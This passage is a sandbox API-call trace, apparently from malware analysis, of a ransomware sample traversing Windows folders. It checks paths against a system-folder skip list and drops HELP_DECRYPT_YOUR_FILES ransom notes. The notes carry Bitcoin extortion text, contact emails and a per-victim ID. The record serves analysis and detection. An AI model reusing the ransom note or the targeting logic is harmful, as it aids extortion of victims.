	[0178.243] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.243] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xab77de3d, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="installcache_x64", cAlternateFileName="INSTAL~1")) returned 1
	[0178.244] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xab77de3d, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="installcache_x64", cAlternateFileName="INSTAL~1")) returned 0
	[0178.244] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0178.244] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0178.246] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Oracle\\Java" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java") returned="C:\\Users\\All Users\\Oracle\\Java"
	[0178.246] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\*.*") returned="C:\\Users\\All Users\\Oracle\\Java\\*.*"
	[0178.247] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.247] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.248] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0178.248] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\java\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.257] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.258] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.264] CloseHandle (hObject=0x384) returned 1
	[0178.268] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.269] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0178.272] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.273] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\java\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.273] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.273] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.277] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0178.277] CloseHandle (hObject=0x384) returned 1
	[0178.277] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.278] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.278] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.278] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0178.278] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\java\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.290] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.290] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0178.293] CloseHandle (hObject=0x384) returned 1
	[0178.293] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.293] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.294] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0178.295] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.295] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\java\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.296] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.296] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.296] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0178.296] CloseHandle (hObject=0x384) returned 1
	[0178.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\Java\\*.*" (normalized: "c:\\users\\all users\\oracle\\java\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x83cc7b3a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0178.297] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\Java\\*.*") returned 34
	[0178.297] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.297] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\Java\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\all users\\oracle\\java\\*.*") returned 0x22
	[0178.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.303] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="windows") returned 0x0
	[0178.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.303] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="boot") returned 0x0
	[0178.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.303] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="system volume information") returned 0x0
	[0178.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.304] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.304] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="temp") returned 0x0
	[0178.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.304] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="program files") returned 0x0
	[0178.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.304] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.305] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="appdata") returned 0x0
	[0178.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.305] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="application data") returned 0x0
	[0178.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.305] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="winnt") returned 0x0
	[0178.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.306] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="tmp") returned 0x0
	[0178.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.306] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="cache") returned 0x0
	[0178.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.306] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.306] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="webcache") returned 0x0
	[0178.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.307] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="inetcache") returned 0x0
	[0178.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.307] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="nvidia") returned 0x0
	[0178.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.307] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="packages") returned 0x0
	[0178.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.307] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="cookies") returned 0x0
	[0178.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.308] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="programdata") returned 0x0
	[0178.308] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.308] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.308] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x83cc7b3a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.308] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.308] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83ca13a4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83ca13a4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83cc7b3a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.308] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c879f6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83c879f6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83ca13a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.308] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xab77de3d, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="installcache_x64", cAlternateFileName="INSTAL~1")) returned 1
	[0178.309] lstrcmpW (lpString1="installcache_x64", lpString2="..") returned 1
	[0178.309] lstrcmpW (lpString1="installcache_x64", lpString2=".") returned 1
	[0178.309] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Oracle\\Java" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java") returned="C:\\Users\\All Users\\Oracle\\Java"
	[0178.309] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\") returned="C:\\Users\\All Users\\Oracle\\Java\\"
	[0178.309] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java\\", lpString2="installcache_x64" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64"
	[0178.309] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64"
	[0178.309] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\"
	[0178.309] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\"
	[0178.310] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*"
	[0178.310] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xab77de3d, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.310] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*") returned 51
	[0178.310] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.311] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*") returned 0x33
	[0178.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.311] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="windows") returned 0x0
	[0178.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.311] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="boot") returned 0x0
	[0178.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.311] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="system volume information") returned 0x0
	[0178.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.312] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.312] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="temp") returned 0x0
	[0178.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.312] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="program files") returned 0x0
	[0178.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.312] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.313] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="appdata") returned 0x0
	[0178.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.318] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="application data") returned 0x0
	[0178.319] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.319] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="winnt") returned 0x0
	[0178.319] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.319] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="tmp") returned 0x0
	[0178.319] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.319] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="cache") returned="cache_x64\\*.*"
	[0178.319] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.320] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64"
	[0178.320] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*") returned="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*"
	[0178.320] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.320] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.320] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0178.320] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0178.321] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.321] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.324] CloseHandle (hObject=0x388) returned 1
	[0178.324] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.324] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0178.326] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
